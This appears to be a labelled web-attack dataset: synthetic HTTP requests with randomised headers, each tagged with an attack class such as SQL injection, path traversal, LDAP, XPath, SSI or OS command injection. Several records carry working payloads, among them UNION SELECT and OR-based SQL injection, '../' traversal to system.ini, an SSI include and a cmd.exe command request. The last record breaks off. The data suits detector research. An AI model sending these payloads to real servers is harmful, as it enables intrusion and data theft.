GET /ZYsXvT1/raspibono5qg8/eeio0if6f4.js?Uis0uktinn=antperl&ln=0&4rRos=3270755177&iAe=%27%29+++++UNION+ALL++++SELECT+9953%2C7401%2C2283%2C470%2C9354+++++FROM+++++ejakn+++WHERE+++++%28+%27%27+%3D%27&hD=atuap&rGwhcPtMboot.iniR=Oen HTTP/1.0
Host: 60.105.16.122
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: eux='b4N'
Client-ip: 19.38.3.115
Cookie: z2HsAL0eGaE9=764;n2aettaecITsea=erscript;dUN4J=1016076;8weeutbhea=5;mNtnze=ntz e
Cookie2: $Version="3"
Date: Sun, 13 Apr 08 20:36:31 CET
ETag: ".4g273Gu0e1YegQr"
Expect: oT8d=iIlx;zinlIOcf
From: nIeior@tiriRlyas.net
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Sat, 10 Feb 07 23:41:46 UTC
If-Match: "dhExo5AzmxbzBeMNCQfj"
If-None-Match: "OGYQBOHGVybBWsl_C"
If-Range: *
Max-Forwards: 244
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ayrepssY"
Authorization: xioe0i emhA=efh6etg
Range: 4745-5836
Referer: http://ezoaer.be/ewto/eaars.js
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 4.3; nc-zt; rv:3.1.7) Gecko/70223792
UA-CPU: x86
UA-Disp: 079,3300,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 832x0332
Via: FTP/5.9 77.72.138.212, HTTP/0.9 139.168.196.124, 7.6 www.uaaego.htm
Transfer-Encoding: identity
Upgrade: Hfra/5.2
Warning: 899 www.hlrs.js:0974 "osaznrsham4kiehae5n" "Mon, 18 Jul 05 24:25:09 CET"
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 79451842006720281
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41782
Start - Id: 42289
class: SqlInjection
GET /eRR/rsMI/lCaW8cLLhomeflW/QONepassthrulibcCls/osWogM1L/eeopCh7rj/eckt0.php3?_RPj2iwinntUBXar=abxbcrMweobke&rtr0oIioaxetme=cienOGeInX8&eyauarznncz=OR+%27di0pea8rhc%27++++%3D++++N%27++++%27&waaowpdtaeners=scraee4&rntoM=rl+V6tpeuet5%2Buwp-rs&AsX0nMe=htmp6qp&w.W-wcfEH=d++rv+group+by%3DmnlocationoEe%3Boswsa&st=edtbbNxeanCrh&WN9stiylfsaptt=%25Ascriptxlink%28lldocument&eNY7BKrm1q=2&seofEUee=elaNfp3S&ssrt6b=704&me=rRnl3fdNo3Ys0iide HTTP/1.1
Host: www.lAalup.st
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, identity, gzip;q=0.6, gzip;q=0.8
Accept-Language: ninn-io4edlat, edLn-fahds;q=0.4, stvr-Gc;q=0.2, ecshtev-ibs7tr2
Cache-Control: min-fresh=956
Client-ip: 230.224.109.250
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="095"
Date: Sun, 05 Feb 06 13:27:37 CET
ETag: W/"17F1n2q6q2So7mxf"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Wed, 23 Dec 09 16:13:25 UTC
If-Unmodified-Since: Sat, 18 Apr 09 19:58:40 CET
If-Match: "QheidUdAsABZIoL8"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.3
Pragma: aqncn='zrr'
Proxy-Authorization: NTLM c2NTYTJ1bDV3emVlZXlUZWV0ZHJhZXR5ZHJiN2dlaWNvY2ZTaWhlZW9ybWNq
Authorization: tusE HcFen=tbiuae
Range: -568889,-588214
Referer: http://src8r.biz/ytha/bir8t.swf
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: neq3dbcriy (tavSl94L; agUh81N)
UA-CPU: PowerPC
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 443x7648
Via: 0.8 106.241.204.205, 9.8 132.18.132.93
Transfer-Encoding: identity
Upgrade: lr2rr/2.7, aetd/1.2, tei/7.3, tgOeft/0.3, Ozehbn/5.9
Warning: 539 www.diea.jpeg "Aotyhee" "Sun, 01 Feb 09 21:46:05 GMT"
X-Forwarded-For: 41.19.144.81
X-Serial-Number: 0737501888973
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42289
Start - Id: 36172
class: PathTransversal
GET /fFwdEX9SC.msf?nyt0trr7I3t=rcvnTbzpa5aefe&cxeolen7sssen=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Ftialnd%2Flarandet%2Fri%2Felolleta.cgi HTTP/1.0
Host: 20.6.106.143:1309
Connection: crcshs
Accept: image/*
Accept-Charset: macintosh, iso-8859-7;q=0.8, x-mac-arabic;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: 6s3eTo-sgUars7e;q=0.1, eizs7ses-nyatONu, ne-b91kbrr;q=0.0, n-recj, p-er;q=0.6
Cache-Control: min-fresh=7
Client-ip: 164.195.241.61
Cookie: 20iBrTcat=eu0Nltuuy;n8uxuzepaShr5=gun<echo;teur;6dpi=eIEaIKW.Fx
Cookie2: $Version="99"
Date: Mon, 22 Mar 10 17:31:13 UTC
ETag: W/"Ur6v1GbQqi5Fpv3B_GUc"
Expect: ojnuth
From: esie@ntoatbni.fr
If-Modified-Since: Mon, 06 Jul 09 19:40:40 CET
If-Unmodified-Since: Thu, 18 Sep 08 12:05:23 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Apr 08 19:03:17 UTC
Max-Forwards: 3062
Pragma: 4tmgrr='w'
Proxy-Authorization: Digest nonce
Authorization: Basic ZWVzbmY1OnFoSG9hVWxy
Range: 462654-
Referer: http://www.egIn.fr/kyEtlt/RlwOuir/1kat8/Ioeh/Ixqey.cfm
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/9.3 (Machintosh; U; Mac OS X 8.3; ne-un; rv:8.6.3) Gecko/22426671
UA-Disp: 4206,422,32
UA-Color: color32
UA-Pixels: 5546x388
Via: HTTP/3.1 www.dhrr3.shtml
Transfer-Encoding: compress
Upgrade: sBc8h/5.5, Lnio/4.6, olj9p/0.5
Warning: 282 www.mar3eOer.jpg "Gzeol4" 
X-Forwarded-For: 214.211.159.226
X-Serial-Number: 4255971850
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36172
Start - Id: 49541
class: XPathInjection
GET /e9b@wAl/oeckG8QYAL1H9jGp7./lte6sNOc/n02vW/tl6HAnneGB/lpb1_likev@PjvbscriptnJp/nlocationkN/ksdFo/ibNdtctyjl0fs50ce0CR.gif?mvaohqAi4=+adSr+&2oei5eehtxaeoD=dtot&roz=9W&kPu=eua8E7qeiT%3A&iy3liirwiene=4&erT=Dh+Feered&zsall-oz=3999781&ienoxLeclrhhoea=hVDK-&lyfebiotdT=etgbe6Poa&rsoIh=07829&nmtcss=nlscaty5naljcltch&8T=OdtpSlhd5Chy&tSsfr0=ytR&oyaMnp=tnhbn%2Fqhd%2Fhv9%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D5%5D++or+++%27ae%27+++%3D+%27 HTTP/1.0
Host: 204.213.61.86
Connection: ucpepon
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oictoco-r;q=0.1, 8e-wIl;q=0.2, ut-thlep;q=0.2, 3tnse0-wm;q=0.9, 6hc-6nh;q=0.2
Cache-Control: no-store
Client-ip: 74.98.44.206
Cookie: clei=ati;6pahh9zna=0rrs9uttrtepM5;exrTboxnmshyl=gsiroIiODt&imo;sneq30ysibUsaln=519
Cookie2: $Version="293"
Date: Wed, 24 May 06 09:22:32 CET
ETag: "X-dmQ_bSlwEWnVCs"
Expect: cieUaqbi
From: wirtsy@nexe4eht.ch
If-Modified-Since: Fri, 30 Oct 09 07:24:24 GMT
If-Unmodified-Since: Sat, 27 Jan 07 22:18:07 GMT
If-Match: "ZnyZQZTH1OGbF9Aiyj"
If-None-Match: "s6EXmOXpq6snrA_ovf"
If-Range: Wed, 08 Mar 06 07:57:31 UTC
Max-Forwards: 17
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM cm1Cbm5naWx0Y2FzcEdob3RyYTJrbDBlOW5udWNlZXJiY29ibnN1c2FzeW9hemM=
Range: 7-1,-171
Referer: http://arla4aeA.cz/frlpyoae.conf
TE: trailers
Trailer: Date
User-Agent: Mozilla/2.7 (Machintosh; U; PPC 7.2; be-s0; rv:8.7.7) Gecko/70537109
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4014x885
Via: HTTP/8.6 26.176.68.18, 7.0 www.F19nna.css:0, lee/8.1 www.Diew.js
Transfer-Encoding: identity
Upgrade: os2eA/3.8, zes2/5.7, z6sc/6.6, jntir/3.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 84222466016930
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49541
Start - Id: 37689
class: LdapInjection
POST /tvtbirahceHzfh.html? HTTP/1.1
Content-Length: 263
Content-Language: e
Content-Encoding: gzip
Content-Location: http://www.2heheit.de/et5d/iuls2/iewaqcw/aHnTl.php
Content-MD5: ZGVoaXpEaGZzbWRpZW9lbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Apr 08 10:41:37 UTC
Last-Modified: Sat, 09 Oct 04 22:00:04 GMT
Host: 158.18.212.73
Connection: rgrtrip4
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.2, x-mac-icelandic, iso-8859-8
Accept-Encoding: *;q=0.4
Accept-Language: Qnnke-wiDiwn;q=0.3, atHnw-taipdeoo, agH-48unu;q=0.1
Cache-Control: max-age=55
Client-ip: 28.10.194.170
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="3"
Date: Tue, 13 Jun 06 16:13:36 UTC
ETag: W/"_@vqRjVs1bA1_fJ"
Expect: 100-continue
From: 2tnped@tsctjtsnt.gov
If-Modified-Since: Wed, 21 Feb 07 03:37:58 CET
If-Unmodified-Since: Tue, 11 Jul 06 03:27:36 UTC
If-Match: "a6LheQf808QtO5v"
If-None-Match: "gv4UFAO-hQSPizwFW"
If-Range: Mon, 08 Jan 07 05:23:20 GMT
Max-Forwards: 6
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: 6058-6,88-,-245437
Referer: http://r7aot6o.org/b5ruzaer/iAeRae/naeoan/jsi8nnl.asmx
TE: chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.7 (compatible; Konqueror/5.9; Open BSD i586; daoan; Rqkdg0hntw; oe7s)
UA-CPU: MIPS
UA-Disp: 533,555,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 940x1719
Via: 0.7 www.Ejegowze.js
Transfer-Encoding: deflate
Upgrade: ldon/1.3, oeCc/5.2, eia/8.5, wqT/7.2
Warning: 355 www.dT68.js "3Sthowaroorcrdfemtte" "Tue, 02 Mar 10 18:12:18 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rl=gaa|<i1oh3 aGdiv<lE&A7X81L=e8eaoavd6f&@p2xycU_=rRt70)(  | (ioOcn=*)&0es=ndka@3ear0@&jM3Zrgb=6aVKw&MumfywOenil=nlo&lrdrqild=nH7J1AGAk&IKVnullG.J7seq=N&nPZeWF=9&mg8ixnnuei=9noky 2orn?nanR&sfht=etxml&45Ms=ehesslgqolaSe&h2hnladirrcfqe=57748

End - Id: 37689
Start - Id: 40682
class: SSI
GET /eja2eie/rxhZf6RPyZF/lkp/jtwm8Rsa3rf/i43P6EAj@Uik7yy/rEADa4.TN_2/jNp/ztVEnChAvxFH/t81SqbweMEln.sh?otfsaddrsntaecO=i1mtol&QlcopyHM63r.document=iUo1j5hWK&sII3tjui=o2QENsJt&zc=htnloehoe8&tNketLn=Me%27Sgt%3B&9imtfp80s4b=C3isinranuEiew&.tO.=3nOJN_wR4&3cwhttpsmvry=1&aagnovcue=%3C%21--+++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E HTTP/1.0
Host: 235.74.54.181
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii, koi8;q=0.6, cp-932;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 59.227.224.32
Cookie: xrzsneOktnshtws=414;mehsgarXwiEely=9i;pynombol=lNstbars4fmhrera;tqteqef7ewg2zn=eJnointoeEiiheoets;1hclrqr=e.iCg0iie
Cookie2: $Version="1"
Date: Sun, 08 Mar 09 03:03:28 CET
ETag: W/"nQowONbBuqGBRqoN"
Expect: a7cn
From: kyipfoyn@ugT7me.be
If-Modified-Since: Sun, 07 Jun 09 13:58:06 UTC
If-Unmodified-Since: Mon, 10 Sep 07 04:09:34 CET
If-Match: "99O..PUVgPiAO.3-gk4"
If-None-Match: *
If-Range: Fri, 30 Apr 10 08:07:23 UTC
Max-Forwards: 7007
Pragma: mtpBst='5ha'
Proxy-Authorization: Digest realm
Authorization: onMiu 54leeoo=0mt8yd
Range: -41940,-0
Referer: /ocfe.jsp
TE: trailers,chunked;q=0.1
Trailer: Host
User-Agent: Mozilla/4.6 (X11; U; Solaris 6.2; li-ii; rv:4.4.1) Gecko/75119618
UA-CPU: StrongARM
UA-Disp: 854,3532,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 106x2848
Via: 5.6 www.i7bcEo.png:2, ieno/6.2 www.tqvenf.css:28216, 9.9 www.naeq.shtml
Transfer-Encoding: gzip
Upgrade: 2vu/5.3, otv/1.9, eEln/4.0, xlziey/0.0, f5sv/6.9
X-Forwarded-For: 199.225.165.233
X-Serial-Number: 017478485639
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40682
Start - Id: 43866
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.uETh.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 232.216.187.51
Cookie: aooDNe8aehuod=deo;dOFB.bfyamail=3811990;enoLr1hte=e07a6j;Tsht=yhelf5hqdAe4etJhm;Nn=ee\stwqitmginhn
Cookie2: $Version="8"
Date: Sun, 22 Feb 04 09:59:22 UTC
ETag: "dGEC@BIj22_xTSaE@"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 22 May 06 14:23:51 GMT
If-Unmodified-Since: Sun, 19 Apr 09 07:36:23 CET
If-Match: "V_CJiOGq0qH4Xo7"
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 1.9
Pragma: fAttmFml='s4a'
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: NTLM aGdkYTdjZWRucWhVZVdUdWVFZWNwbnNleXRvNXR0bWlhc21yZGZkNnJjYWNFcjU3
Range: 91796-,027282-114595
Referer: /ioein/nhoe/Iw7iy.swf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/1.0 (Windows; U; WinNT 0.7; ea-cO; rv:1.8.9) Gecko/56728639
UA-CPU: Sparc
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/7.1 www.dsOpFhe.jpg:988, FTP/1.3 www.fndeeYt.html, HTTP/6.4 222.118.147.81:4
Transfer-Encoding: 1qsm; vrjcoda9=adoeErc7
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 271 62.138.196.100 "8z8l8ou" "Tue, 21 Feb 06 05:57:12 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43866
Start - Id: 37514
class: LdapInjection
PUT /oj-YPKEt4lO8/dlf7TM.asknDoS0/geesMl/.BUBP/C2F6dqawBA@/lH0For/si1t5/aXcFc/dyr7n9dr/ey/qrYLRcerJstylepmb53/ursmRpstetocdomhiyjr.pl? HTTP/1.0
Content-Length: 343
Content-Language: odk,g
Content-Encoding: deflate
Content-Location: http://www.nyeke.org/r4eieI/rfuninDh/6npynat/weslol0/siSuSte.jsp
Content-MD5: ZkVscnRhYXRxTDVnY0NzRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Jul 04 08:47:31 CET
Last-Modified: Fri, 20 Apr 07 20:09:18 CET
Host: www.nf0apt.net
Connection: keep-alive
Accept: video/*;q=0.7, audio/x-wav;q=0.5, image/jpeg
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 243.13.167.199
Cookie: raDitltr=3455;2lr=muald;AelEta=661;geoosiysel=532372;admin.uTT2=Le e7i >eT7<mew
Cookie2: $Version="571"
Date: Thu, 14 Jun 07 07:22:51 CET
ETag: W/"sa0vFx7xhNJYWVp7t4"
From: t7in1r0e@I35dntt6be.fr
If-Modified-Since: Sat, 28 Nov 09 08:41:55 GMT
If-Unmodified-Since: Sat, 16 Jan 10 09:05:33 GMT
If-Match: "OSkvfGtAenBHvp1LP"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 0.6
Pragma: rU='6tge'
Proxy-Authorization: Digest username="htyrO"
Authorization: NTLM dGFzbHRyb3l3Vm92dGNtcnBhYXRpamhyV0tyYW94c3lvOGFzVWxyYW9l
Range: 0516-7855,069180-,334-
Referer: /ywat/rfeEnc/imano/mRas/s64aN.swf
TE: gzip;q=0.3
Trailer: Connection
User-Agent: Mozilla/4.0 (Windows; U; Win 9x 9.2; yW-ms; rv:5.7.5) Gecko/37755205
UA-CPU: 68000
UA-Pixels: 2665x9772
Via: HTTP/9.6 221.168.145.233
Transfer-Encoding: gzip
Upgrade: c0e/0.5, ndgd/9.1
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569

tnyReiitooona=51304&rmrnetcatvbscript8uXwtIWW=tetanw&irstaomirne=5y&nveewMolsr=224&a1p2n=67340&piqexbrnl7=meIRraik0os&hypwn=3819205&usnE6tienen=er3Y5ARiU9X&HpD6Lusrscript=xmExerstyoaIyTb&window.openWNBzC0CB=)    ( | (    cn=*o  'brien*   )(mail =*o   'brien*  )   &wp-I-jbodyH=k&eahlno=29398802&icalLiia=icoa0piorcceisEeb

End - Id: 37514
Start - Id: 41537
class: SqlInjection
PUT /tBOu7D5-YKbRA1bcJ2U.jpeg? HTTP/1.1
Content-Length: 109
Content-Language: odls
Content-Encoding: identity
Content-Location: http://lpta.uk/19eNrt/alogthny/aIitpc8h/LncwTeeU/9ehrio.mspx
Content-MD5: dHNzMm5adHl1a25pb2lyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jul 04 08:26:51 UTC
Last-Modified: Thu, 12 Jun 08 08:40:27 GMT
Host: 155.79.190.179:752
Connection: close
Accept: application/*, text/*, application/*;q=0.1
Accept-Charset: utf-8;q=0.3, euc-jp;q=0.7, iso-8859-15, iso-8859-15;q=0.3, iso-8859-1;q=0.8
Accept-Encoding: compress, deflate, compress;q=0.0, identity;q=0.3
Accept-Language: *
Cache-Control: max-stale=2105
Client-ip: 124.86.136.28
Cookie: pc8arhnCzxinia=noa5Zbm.kb;nercwi33eajfe=ohaving=aoelreeiframenczhome
Cookie2: $Version="1"
Date: Sun, 10 May 09 21:55:36 GMT
ETag: W/"6-69Euuq1Ajx0PW8f"
Expect: 100-continue
From: feAns@ntri9.gov
If-Modified-Since: Tue, 01 Jun 04 11:16:23 CET
If-Unmodified-Since: Fri, 06 Feb 09 14:21:04 CET
If-Match: *
If-None-Match: *
If-Range: "UqlRL1VUJ@B88@rl@5we"
Max-Forwards: 9
Authorization: NTLM c3FvcmRmZWljb3ltZUF4VGF1bWloc2lkaG9OaG50bWhl
Range: 57094-3
Referer: /Andhmeab/desm/rmo2z/ownTmnnv.mp3
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: erict45S7t9tfVthiaeh
UA-OS: WinNT
UA-Color: color8
Via: 1.9 www.opea.tiff
Transfer-Encoding: identity
Upgrade: ied/4.5, ed6tn/2.3, fotom/3.2, ooni/6.1, hhIt/6.5
Warning: 202 172.75.239.75:0 "5HknetoSUn9esaen" 

tSt6d=ehdcsc? m|&iasstNiexsS7=pxaehqginhdoohl&peth='   OR   ''  = '&ffdsacll=35324205&.hhA7Q=82

End - Id: 41537
Start - Id: 45099
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.0
Host: www.ncAz.uk:80
Connection: close
Accept: audio/*;q=0.2, text/*, image/jpeg;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: a-p9vlhr;q=0.6, mCmh-uaonk4
Cache-Control: only-if-cached
Client-ip: 217.208.54.150
Cookie: sedtph=3
Cookie2: $Version="8"
Date: Sun, 18 Feb 07 16:24:22 UTC
ETag: "NeIswK_7a5EBHO2LNI"
Expect: 100-continue
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Sun, 21 Mar 04 21:14:23 UTC
If-Unmodified-Since: Tue, 18 Mar 08 17:40:36 UTC
If-Match: "@qTsqfeb1mDFCco"
If-None-Match: "UTO0q3VBxUsrOf0."
If-Range: "s@O51GsxN2Uie9S"
Max-Forwards: 2
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: Basic T2UzdHNiZUw6ZXN2NnVT
Range: -3,456-488022
Referer: /texu/24zSe1/snht.wmn
TE: gzip;q=0.6,trailers
Trailer: Connection
User-Agent: Pl4elt
UA-CPU: StrongARM
UA-Disp: 4629,539,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.0 91.186.196.32
Transfer-Encoding: gzip
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: ----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45099
Start - Id: 41967
class: SqlInjection
GET /.nnDtmphform1HLMwCdroplike/jriqLmtickxeTuln/eO-A5K_hBwIMnYlOE/ua/lo/dvOJuRbwAK1UDXkufMZj/odd/4FuUw/e3r1/nbnpc0m.gif?ctcl9ncoenl8rog=715311&otdcfn=OR+++++%27a3hlv0erc%27+++++IN+%28+%27+%27++++%29&slhGeert=o+O&37Tsk2=9521106212&rho6odam=tQ_U0N&I03ett=230683&Hb-sx7samlog=ebnsstatscmds&e67Sx=53918125&formC2TF=hBDc1fsTBSeX&2@tLWQ.RKphplibu=EFact&hgti=g&iatotgdlnt=otatoeedrtr9lc&ee=7004 HTTP/1.0
Host: www.arvedl.de
Connection: keep-alive
Accept: video/*;q=0.1, image/*, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 40.55.189.126
Cookie: e8=1265060264;eeuwoa=edDNL
Cookie2: $Version="717"
Date: Sun, 26 Nov 06 24:55:01 CET
ETag: W/"4m-sPlFALVJXkVY1K"
Expect: 100-continue
From: 4zD9@jt6etwau5.be
If-Modified-Since: Mon, 15 Jan 07 20:24:15 UTC
If-Unmodified-Since: Mon, 03 May 10 20:05:42 GMT
If-Match: *
If-None-Match: "O1w-Jsqx72emG7d4wbl"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 75
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic V2VibzppeXRRYmJo
Range: 991-40833,238399-36
Referer: http://jbsrern.com/zurul74w.php4
TE: deflate,gzip;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.6 (Windows; U; Windows NT 5.0; ve-ta; rv:4.0.8) Gecko/56445815
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 329x4778
Via: 2.2 www.4dfrtE.shtml:066
Transfer-Encoding: identity
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41967
Start - Id: 38039
class: LdapInjection
GET /4y7cAoikgi/t__Is/r3/l2C.CjE0@YdwQW8opXPS/C9tl/imgSaccess_logbCAidKDsCWf/yHncGreplaceKit@xtermssUbetweenP/laeytyxih.png?Icaheli7earsnet=5&NEh=829594090&aSe=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&yiwRnph-servicesu=40&tr7cmrpiqart=9&7hK.vservices=%5Cts28itfrt2n5nq&entcdiiti=r+ri%25&Ttefoc7nEeshHe=idhte HTTP/1.0
Host: www.uineLr.cz
Connection: 57eer4dg
Accept: audio/basic;q=0.4
Accept-Charset: shift_jis;q=0.4, x-mac-arabic, x-mac-korean;q=0.3
Accept-Encoding: deflate;q=0.9
Accept-Language: hdw-bnsea, ez-tattrHtt;q=0.6, psj7vm-it5, h-hhas;q=0.1, ni-amRwetr
Cache-Control: only-if-cached
Client-ip: 245.129.164.208
Cookie: ZGQKaFS=eiE]pka2 o;eoIseAyde2=neenn;s6dsontutlt=kC.h.CeBYNrE;oyddznteihos=gfetsybieltrise;ioyeehNsMsqenbf=482725
Cookie2: $Version="76"
Date: Mon, 13 Oct 08 08:44:07 UTC
ETag: W/"5STQALlxr0GBlGNwgc"
Expect: 100-continue
From: deigiel@Ostrbaef.it
If-Modified-Since: Tue, 15 Sep 09 20:04:22 CET
If-Unmodified-Since: Tue, 13 Oct 09 03:34:09 CET
If-Match: "N5f9EP2D9bpROD81hpDQ"
If-None-Match: *
If-Range: *
Max-Forwards: 69
MIME-Version: 8.8
Pragma: nbah='wa'
Proxy-Authorization: NTLM eW9hQm41aGRzYkZwdG9yc3Roc2Ftd3BrYXdySTR4aGFt
Authorization: Digest opaque="tcranau"
Range: 5217-69596,5-
Referer: /dxORe/cdKar3e/lnRwdSro/fefnn.tiff
TE: chunked,chunked,trailers
Trailer: Cache-Control
User-Agent: asykb (bZ5v-z_y; 0YfEwEBv; 0W_z0f; 4Z2yDt1GhZ; weXB93)
UA-CPU: MIPS
UA-Disp: 879,787,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: 2.3 www.sr9aepne.shtml, FTP/1.8 245.214.53.113, 5.8 25.40.215.110
Transfer-Encoding: gzip
Upgrade: sok/2.9, aiedsC/6.4, uph/8.9
Warning: 864 185.80.26.144 "Nciqesnma5Srctnr" "Wed, 25 Nov 09 18:45:33 UTC"
X-Forwarded-For: 212.17.65.81
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38039
Start - Id: 41700
class: SqlInjection
GET /aaerirmnlN5.shtml?mFsoejszlo=ueHL&likeAj.mB16S1access_log0=ooiggr&sHrcpuK_Edk1document5=aewa&be4cd=%24na0a&ee9ab5Mun=ayfdereDN&5t=tspassthruae&2asXathpIao=yCminputl&KXb75o_qvgxp_=%28oyre%5Cobodyidsa1tcips&apeevtpsdehl=nVg&pnntrseoncs=ob1%40bi%2Feaer%3Cy&Uhohn59eyanniv=l4eu5auitiofFh1aos&rannl3O=oe%3Ct%2FNm&j7r6x=%27+OR+++%27eEtnY%27+++%3D++N%27++ HTTP/1.1
Host: 189.125.93.139
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lqzhlkzi-idlhpa;q=0.9, ahyot9-hdn;q=0.0
Cache-Control: max-age=31
Client-ip: 51.187.24.113
Cookie: aihe3rreOeieT=088240
Cookie2: $Version="1"
Date: Mon, 21 May 07 04:17:09 GMT
ETag: "AG5CAg.oj.vm0Whv.Z2"
Expect: nllry
From: ube8gesO@rdptemmi.st
If-Modified-Since: Wed, 08 Dec 04 11:10:56 GMT
If-Unmodified-Since: Thu, 25 Sep 08 01:17:27 GMT
If-Match: "msN5PVFwMXvA_pA_3x"
If-None-Match: *
If-Range: "-KuWBsW5qsrNho.1"
Max-Forwards: 650
MIME-Version: 5.8
Pragma: naet=h
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest username="b5e2"
Range: 864538-4,42725-309719
Referer: /awsRc.tiff
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: thstvgnn/4.8.3.1
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 128x875
